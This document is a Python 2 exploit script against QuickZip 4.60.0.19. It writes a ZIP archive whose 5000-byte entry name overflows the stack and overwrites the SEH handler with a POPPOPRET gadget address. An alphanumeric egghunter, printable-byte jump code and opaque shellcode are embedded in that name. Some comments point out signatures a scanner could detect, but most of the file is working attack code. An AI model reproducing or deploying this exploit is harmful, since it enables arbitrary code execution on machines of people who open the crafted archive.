# Exploit Title: QuickZip 4.60.0.19 SEH Overwrite Exploit using POPPOPRET from self-executable (Tested on Windows XP SP3)
# Based on https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/
# Date: 06/18/2018
# Python 2 script (print statements, raw_input, str-as-bytes): writes one small
# ZIP archive, "tiptiptipboom.zip", whose single entry carries a 5000-byte file
# name. Per the title comment above, that oversized name is what overflows
# QuickZip's stack buffer and overwrites the SEH record; the container around it
# is otherwise ordinary (stored entry, zero CRC and zero sizes).
#
# Defensive reading: the archive is structurally valid ZIP, so the entry rather
# than the container is what a scanner can key on -- a file-name-length field of
# 5000, a name holding a NUL byte (inside the 0x00407a33 address) and other
# non-printable bytes, and all-zero CRC/size fields for a stored entry.
import os, struct
# Stage-2 payload. It is not placed at a known address; it is tagged with
# "T00WT00W" inside the file name (see `filename`) so the egghunter can find it.
# Opaque machine code, reproduced as-is.
shellcode = (
"\xba\x86\x09\x42\x5b\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x4f\x31\x56\x14\x03\x56\x14\x83\xc6\x04\x64\xfc\xbe\xb3\xe1"
"\xff\x3e\x44\x91\x76\xdb\x75\x83\xed\xaf\x24\x13\x65\xfd\xc4"
"\xd8\x2b\x16\x5e\xac\xe3\x19\xd7\x1a\xd2\x14\xe8\xab\xda\xfb"
"\x2a\xaa\xa6\x01\x7f\x0c\x96\xc9\x72\x4d\xdf\x34\x7c\x1f\x88"
"\x33\x2f\x8f\xbd\x06\xec\xae\x11\x0d\x4c\xc8\x14\xd2\x39\x62"
"\x16\x03\x91\xf9\x50\xbb\x99\xa5\x40\xba\x4e\xb6\xbd\xf5\xfb"
"\x0c\x35\x04\x2a\x5d\xb6\x36\x12\x31\x89\xf6\x9f\x48\xcd\x31"
"\x40\x3f\x25\x42\xfd\x47\xfe\x38\xd9\xc2\xe3\x9b\xaa\x74\xc0"
"\x1a\x7e\xe2\x83\x11\xcb\x61\xcb\x35\xca\xa6\x67\x41\x47\x49"
"\xa8\xc3\x13\x6d\x6c\x8f\xc0\x0c\x35\x75\xa6\x31\x25\xd1\x17"
"\x97\x2d\xf0\x4c\xa1\x6f\x9d\xa1\x9f\x8f\x5d\xae\xa8\xfc\x6f"
"\x71\x02\x6b\xdc\xfa\x8c\x6c\x23\xd1\x68\xe2\xda\xda\x88\x2a"
"\x19\x8e\xd8\x44\x88\xaf\xb3\x94\x35\x7a\x13\xc5\x99\xd5\xd3"
"\xb5\x59\x86\xbb\xdf\x55\xf9\xdb\xdf\xbf\x8c\xdc\x48\x80\x27"
"\x3c\x0d\x68\x3a\xc0\x1f\x35\xb3\x26\x75\xd5\x95\xf1\xe2\x4c"
"\xbc\x89\x93\x91\x6a\x19\x37\x03\xf1\xd9\x3e\x38\xae\x8e\x17"
"\x8e\xa7\x5a\x8a\xa9\x11\x78\x57\x2f\x59\x38\x8c\x8c\x64\xc1"
"\x41\xa8\x42\xd1\x9f\x31\xcf\x85\x4f\x64\x99\x73\x36\xde\x6b"
"\x2d\xe0\x8d\x25\xb9\x75\xfe\xf5\xbf\x79\x2b\x80\x5f\xcb\x82"
"\xd5\x60\xe4\x42\xd2\x19\x18\xf3\x1d\xf0\x98\x03\x54\x58\x88"
"\x8b\x31\x09\x88\xd1\xc1\xe4\xcf\xef\x41\x0c\xb0\x0b\x59\x65"
"\xb5\x50\xdd\x96\xc7\xc9\x88\x98\x74\xe9\x98" )
# Printable-ASCII-only egghunter, so it survives wherever the file name is
# copied. Presumably it scans for the "T00WT00W" tag placed just before
# `shellcode` in `filename` below -- inferred from the layout, not shown here.
egghunter = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FnaxJiodO2bPRqzs2chHMfNelS52zadzOmhRtvPDpf7NkJZNObUxjloRUxgkOxgAA"
# Four ASCII-range x86 opcodes (three POP EDI, one POP ESP); the name says they
# re-point the stack, but the stack state they rely on is not visible here.
stack_align = "\x5f\x5f\x5f\x5c"
# Two AND EAX,imm32 with complementary masks (0x554E4D4A & 0x2A313235 == 0),
# leaving EAX = 0 using only printable bytes.
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
# Repeated SUB EAX,imm32 (0x2D) then PUSH EAX (0x50): a value is assembled in
# EAX from printable immediates and pushed. This is the classic trick for
# emitting arbitrary bytes when the carrier (here, a file name) restricts the
# byte range; the resulting jump target is not documented on this page.
magicjmp = stack_align + zero_eax + "\x2D\x40\x53\x55\x5F\x2D\x40\x53\x55\x5F\x2D\x42\x55\x56\x60\x50"
magicjmp += zero_eax + "\x2D\x39\x37\x33\x53\x2D\x39\x37\x33\x53\x2D\x39\x39\x33\x54\x50"
# POPPOPRET in QuickZip.exe 0x00407a33
# Fixed-offset layout of the 5000-byte file name (the "Size =" print below
# confirms the total):
#   [0, 200)    egghunter, 'A'-padded
#   [200, 294)  magicjmp, 'A'-padded
#   [294, 298)  "\x73\xff\x41\x41" -- presumably the next-SEH pointer slot
#   [298, 302)  0x00407a33 little-endian -- the SEH handler slot, pointed at the
#               POPPOPRET gadget noted above (this is where the NUL byte enters)
#   [302, 310)  "T00WT00W" egg tag
#   [310, ...)  shellcode, then 'D' padding out to exactly 5000 bytes
filename = egghunter + "A" * (200 - len(egghunter)) + magicjmp + "A" * (294 - 200 - len(magicjmp)) + "\x73\xff\x41\x41" + "\x33\x7a\x40\x00" + "T00WT00W" + shellcode + "D" * (5000 - 294 - 4 - 4 - 8 - len(shellcode))
# =======================================================================================================
# Minimal ZIP container, hand-packed little-endian. Compression method 0
# (stored) with zero CRC and zero sizes: the entry has no data at all, only a
# name. The two name-length fields use '<h' (signed 16-bit); 5000 fits.
lfheader = "\x50\x4b\x03\x04" # local file header signature
lfheader += "\x14\x00" # version needed to extract
lfheader += "\x00\x00" # general purpose bit flag
lfheader += "\x00\x00" # compression method
lfheader += "\xb7\xac" # file last modtime
lfheader += "\xce\x34" # file last moddate
lfheader += "\x00\x00\x00\x00" # crc32
lfheader += "\x00\x00\x00\x00" # compressed size
lfheader += "\x00\x00\x00\x00" # uncompressed size
lfheader += struct.pack('<h', int(len(filename))) # file name length (5000)
lfheader += "\x00\x00" # extra field length
cdfheader = "\x50\x4B\x01\x02" # central directory file header signature
cdfheader += "\x14\x00" # version made by
cdfheader += "\x14\x00" # version needed to extract
cdfheader += "\x00\x00" # general purpose bit flag
cdfheader += "\x00\x00" # compression method
cdfheader += "\xB7\xAC" # file last modtime
cdfheader += "\xCE\x34" # file last moddate
cdfheader += "\x00\x00\x00\x00" # crc32
cdfheader += "\x00\x00\x00\x00" # compressed size
cdfheader += "\x00\x00\x00\x00" # uncompressed size
cdfheader += struct.pack('<h', int(len(filename))) # file name length (5000, same name repeated)
cdfheader += "\x00\x00" # extra field length
cdfheader += "\x00\x00" # file comment length
cdfheader += "\x00\x00" # disk number where file starts
cdfheader += "\x01\x00" # internal file attributes
cdfheader += "\x24\x00\x00\x00" # external file attributes
cdfheader += "\x00\x00\x00\x00" # relative offset of local file header (it is first in the archive)
eocd = "\x50\x4B\x05\x06" # end of central directory signature
eocd += "\x00\x00" # number of this disk
eocd += "\x00\x00" # disk where central directory starts
eocd += "\x01\x00" # number of central directory records on this disk
eocd += "\x01\x00" # total number of central directory records
eocd += struct.pack('<L', int(len(cdfheader + filename))) # size of central directory (bytes)
eocd += struct.pack('<L', int(len(lfheader + filename))) # offset of start of central directory, relative to start of archive (local header + name come first in buf)
eocd += "\x00\x00" # comment length
# =======================================================================================================
print "Size = " + str(len(filename))
print "lfheader_length = " + str(len(lfheader))
print "cdfheader_length = " + str(len(cdfheader))
print "eocd_length = " + str(len(eocd))
# Shells out to the Windows `del` built-in to clear any earlier output file;
# os.remove() would do the same without a shell and without depending on cmd.exe.
os.system("del tiptiptipboom.zip")
# Archive order: local header + name, central directory entry + name, EOCD --
# matching the offsets packed into `eocd` above.
buf = lfheader + filename + cdfheader + filename + eocd
# NOTE(review): opened in text mode ("w"); on Windows, Python 2 text mode rewrites
# any 0x0a byte on write, so the file would only be byte-exact while buf has none.
fh = open("tiptiptipboom.zip", "w")
fh.write(buf)
fh.close()
raw_input('Press Enter to exit')